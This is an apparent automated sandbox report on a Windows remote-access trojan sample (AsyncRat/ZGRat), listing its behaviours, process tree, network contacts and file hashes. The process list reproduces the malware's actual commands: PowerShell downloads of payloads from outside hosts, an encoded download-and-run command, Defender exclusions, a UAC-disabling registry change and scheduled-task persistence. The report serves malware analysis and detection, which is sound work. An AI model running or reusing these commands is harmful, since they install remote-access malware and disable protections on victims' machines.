Analysis Overview
SHA256
f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a
Threat Level: Known bad
The file resources.exe was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Detect ZGRat V1
AsyncRat
ZGRat
Async RAT payload
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Drops startup file
Checks computer location settings
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Program crash
Unsigned PE
Suspicious use of WriteProcessMemory
Modifies registry class
Delays execution with timeout.exe
Modifies registry key
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-15 10:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-15 10:45
Reported
2023-11-15 10:48
Platform
win7-20231023-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\resources.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2124 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\resources.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2124 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\resources.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2124 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\resources.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2124 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\resources.exe | C:\Windows\SysWOW64\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\resources.exe
"C:\Users\Admin\AppData\Local\Temp\resources.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 820
Network
Files
memory/2124-0-0x0000000000880000-0x0000000000896000-memory.dmp
memory/2124-1-0x0000000074530000-0x0000000074C1E000-memory.dmp
memory/2124-3-0x0000000074530000-0x0000000074C1E000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-11-15 10:45
Reported
2023-11-15 10:48
Platform
win10v2004-20231023-en
Max time kernel
147s
Max time network
153s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
ZGRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\RunNihaiersion.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\RunihaiVersion.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe | C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe | C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Music\RunNihaiersion.exe | N/A |
| N/A | N/A | C:\Users\Public\Music\israil.exe | N/A |
| N/A | N/A | C:\Users\Public\Music\RunihaiVersion.exe | N/A |
| N/A | N/A | C:\Users\Public\Music\israil2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ChromeCrt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\WiDefault.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\2WinDefault.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\OperaCrt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\VisualStudioo.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinDefatullt = "C:\\Users\\Admin\\AppData\\Roaming\\WinDefatullt\\WinDefatullt.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OperaCert = "C:\\Users\\Admin\\AppData\\Roaming\\OperaCert\\OperaCert.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VisualStudioCert = "C:\\Users\\Admin\\AppData\\Roaming\\VisualStudioCert\\VisualStudioCert.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5400 set thread context of 5636 | N/A | C:\Users\Admin\AppData\Roaming\WiDefault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 5492 set thread context of 5860 | N/A | C:\Users\Admin\AppData\Roaming\OperaCrt.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 5892 set thread context of 2212 | N/A | C:\Users\Admin\AppData\Roaming\VisualStudioo.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 5896 set thread context of 2744 | N/A | C:\Users\Admin\AppData\Roaming\ChromeCrt.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |
| PID 2212 set thread context of 1132 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\2WinDefault.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\resources.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\resources.exe
"C:\Users\Admin\AppData\Local\Temp\resources.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\00b65495-88ce-45af-bf00-3dc3c78edb4f.bat
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"
C:\Users\Public\Music\RunNihaiersion.exe
RunNihaiersion.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Users\Public\Music\israil.exe
"C:\Users\Public\Music\israil.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"
C:\Users\Public\Music\RunihaiVersion.exe
RunihaiVersion.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Users\Public\Music\israil2.exe
"C:\Users\Public\Music\israil2.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"
C:\Users\Admin\AppData\Local\Temp\xx.exe
xx.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe
C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe
C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe
C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe
C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe
C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe
C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAdgB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAxADkAMAA4ADEAMgA1ADEANgAzADkAMwAvAFYAaQBzAHUAYQBsAFMAdAB1AGQAaQBvAEMAZQByAHQALgBlAHgAZQAnACwAIAA8ACMAcQBmAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAHcAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAGwAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApACkAPAAjAG4AbABpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAdwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHkAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApADwAIwBxAHEAZwAjAD4A"
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe
C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe
C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe
C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe
C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\zhXaQqWy8P.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe
C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"
C:\Users\Admin\AppData\Roaming\WiDefault.exe
"C:\Users\Admin\AppData\Roaming\WiDefault.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\2WinDefault.exe
"C:\Users\Admin\AppData\Roaming\2WinDefault.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6088 -ip 6088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 808
C:\Users\Admin\AppData\Roaming\OperaCrt.exe
"C:\Users\Admin\AppData\Roaming\OperaCrt.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'
C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
"C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | img.guildedcdn.com | udp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.219.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.113.22.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 39.142.81.104.in-addr.arpa | udp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 135.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 25.14.97.104.in-addr.arpa | udp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | textbin.net | udp |
| US | 148.72.177.212:443 | textbin.net | tcp |
| US | 8.8.8.8:53 | 212.177.72.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| TR | 46.1.103.69:4263 | | tcp |
| US | 8.8.8.8:53 | 69.103.1.46.in-addr.arpa | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 17.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| TR | 46.1.103.69:7355 | | tcp |
| TR | 46.1.103.69:4263 | | tcp |
| TR | 46.1.103.69:7355 | | tcp |
| US | 8.8.8.8:53 | 13.173.189.20.in-addr.arpa | udp |
Files
memory/4448-0-0x00000000006E0000-0x00000000006F6000-memory.dmp
memory/4448-1-0x0000000074EE0000-0x0000000075690000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\00b65495-88ce-45af-bf00-3dc3c78edb4f.bat
| MD5 | d0cec99ca3a717c587689ebf399662c4 |
| SHA1 | 1d4bbaf8079912ada46a6fa8693d8c20d5ec5b66 |
| SHA256 | b1ae110ef84ecec90a75742ca29adc0704b67abe8f093aa5a959ea0864766228 |
| SHA512 | 99b21193db6615a33eb738c246229e9a7efcaf03fcab24654d67680396155a0c62cbc834078687d75d1892b1708383eafeda4f87e86b33bd827b18bc988122f7 |
memory/1148-5-0x0000000074EE0000-0x0000000075690000-memory.dmp
memory/1148-4-0x0000000002760000-0x0000000002796000-memory.dmp
memory/1148-6-0x00000000027D0000-0x00000000027E0000-memory.dmp
memory/1148-7-0x0000000004F20000-0x0000000005548000-memory.dmp
memory/1148-8-0x0000000004E70000-0x0000000004E92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_atkaxood.1fr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1148-9-0x0000000005640000-0x00000000056A6000-memory.dmp
memory/1148-19-0x00000000057F0000-0x0000000005856000-memory.dmp
memory/1148-20-0x00000000058A0000-0x0000000005BF4000-memory.dmp
memory/1148-21-0x0000000005D20000-0x0000000005D3E000-memory.dmp
memory/1148-22-0x0000000005F80000-0x0000000005FCC000-memory.dmp
memory/1148-23-0x00000000027D0000-0x00000000027E0000-memory.dmp
memory/1148-24-0x0000000007350000-0x00000000079CA000-memory.dmp
memory/1148-25-0x0000000006240000-0x000000000625A000-memory.dmp
memory/1148-29-0x0000000074EE0000-0x0000000075690000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
